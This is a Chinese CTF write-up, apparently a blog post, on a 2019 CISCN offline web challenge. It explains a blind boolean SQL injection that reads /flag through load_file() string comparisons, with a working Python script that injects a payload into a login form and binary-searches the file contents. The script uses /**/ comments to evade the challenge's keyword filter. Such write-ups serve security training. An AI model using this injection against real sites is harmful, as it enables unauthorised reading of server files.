ciscn2019 华东南赛区线下赛WEB第一题

题目过滤了union 和大量的sql函数,本意是想让人读文件,当时心太急了没做出来,现在复习一下,脚本很简单,利用的是ascii的字符串比较 如
select load_file('/flag')>='A'
select load_file('/flag')>='AB'
select load_file('/flag')>='ABC'
select load_file('/flag')>='ABCD'
简单利用这个逻辑可以写出一个二分的做法
直接看代码吧

import requests
url = 'http://localhost/index.php'
def func(x):
	x = x.replace(' ','/**/')
	return x
flag = ''
def check(mid,mystr):
	username = """hack' or binary (select load_file('/flag'))>='{0}'#"""
	username = func(username)
	username = username.format(mystr)
	password = 'hack'
	r = requests.post(url=url,data={'username':username,'password':password})	
	return 'success' in r.content
		
for i in range(1,20):
	left = 0
	right = 255
	while left < right:
		mid = (left+right+1)>>1
		if check(mid,flag+chr(mid)):
			left = mid
		else:
			right = mid-1
	flag += chr(left)
	print flag

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值